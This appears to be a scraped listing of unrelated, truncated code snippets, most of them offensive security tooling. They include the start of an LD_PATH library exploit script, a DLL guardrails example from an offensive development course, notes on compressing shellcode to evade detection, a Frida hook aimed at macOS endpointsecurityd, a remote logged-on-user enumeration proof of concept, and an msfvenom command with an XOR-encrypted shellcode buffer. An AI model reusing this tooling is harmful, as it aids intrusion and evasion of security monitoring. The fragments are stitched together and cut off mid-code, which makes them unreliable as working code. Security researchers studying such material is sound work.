#!/bin/sh | |
# ./ld_path_exploit.sh /usr/lib/libgpg-error.so.0 top | |
TARGET_LIB=$1 | |
MISSING_SYMBOLS="$(readelf -s --wide ${TARGET_LIB} \ | |
| grep 'FUNC\|OBJECT' \ | |
| grep -v 'UND\|ABS' \ | |
| awk '{print $8}' \ |
#include <windows.h> | |
#include <string> | |
#include <vector> | |
#include <algorithm> | |
// White Knight Labs - Offensive Development Course | |
// DLL Guardrails Example | |
// This function extracts the file name from a given path.
// It is used later to determine the name of the executable that is loading the DLL.
/** | |
Compression using undocumented API in rdpbase.dll | |
RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH. | |
This code supports all except NCRUSH. | |
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection. | |
NCRUSH compression appears to work but fails for decompression. |
from requests.adapters import HTTPAdapter, Retry | |
from requests import Session | |
# Retry policy: up to five attempts, with a backoff factor of 1 between
# attempts, retrying only on the listed gateway-side status codes.
retries = Retry(total=5, backoff_factor=1, status_forcelist=[502, 503, 504])

# One Session is kept for the whole script so the underlying TCP connection
# is reused across requests instead of being re-established each time.
session = Session()

# Mount a retry-aware adapter for each scheme; a separate adapter instance is
# registered per scheme, exactly as before.
http_adapter = HTTPAdapter(max_retries=retries)
https_adapter = HTTPAdapter(max_retries=retries)
session.mount("http://", http_adapter)
session.mount("https://", https_adapter)
/* | |
Author: Brandon Dalton (Red Canary Threat Research) | |
Date: 2023-12-07 | |
Summary: This script attempts to instrument the `sendEvent:event:` method of the ESCoreAnalytics class. | |
- Download this script | |
- Target: You're targeting `endpointsecurityd`, so grab its PID: `sudo launchctl list | grep endpointsecurityd` | |
- To run: `sudo frida -p $PID -l es_coreanalytics_event_subs.js` | |
*/ | |
const eventTypeMapping = { |
function Install-DbgHelp { | |
param ( | |
[Parameter(Mandatory=$true, Position=0)] | |
[string] $DbgHelpBaseDir, | |
[Parameter()] | |
[string[]] $DbgHelpFiles = @('dbghelp.dll','symsrv.dll','srcsrv.dll'), | |
[Parameter()] | |
[switch] $Cleanup |
using System; | |
using System.Collections.Generic; | |
using System.Security.Principal; | |
using System.Text.RegularExpressions; | |
/* | |
PoC to enumerate logged-on users on a remote system using the winreg named pipe. | |
Based on the work of Rohan Vazarkar (@cptjesus) and Antonio Cocomazzi (@splinter_code). | |
RemoteRegistry service must be enabled (default) for this to work. |
#include <cstdint> | |
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
unsigned char buf[] = | |
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
// By [Colin Finck] and used by the [Comprehensive Rust] course, | |
// developed by the Android team at Google. | |
// | |
// This code compiles warning-free at the default warning level, | |
// even in the latest GCC version (13.2 as of writing). | |
// | |
// [Colin Finck]: https://colinfinck.de/Master_Thesis_Slides.pdf | |
// [Comprehensive Rust]: https://github.com/google/comprehensive-rust | |
#include <stdio.h> |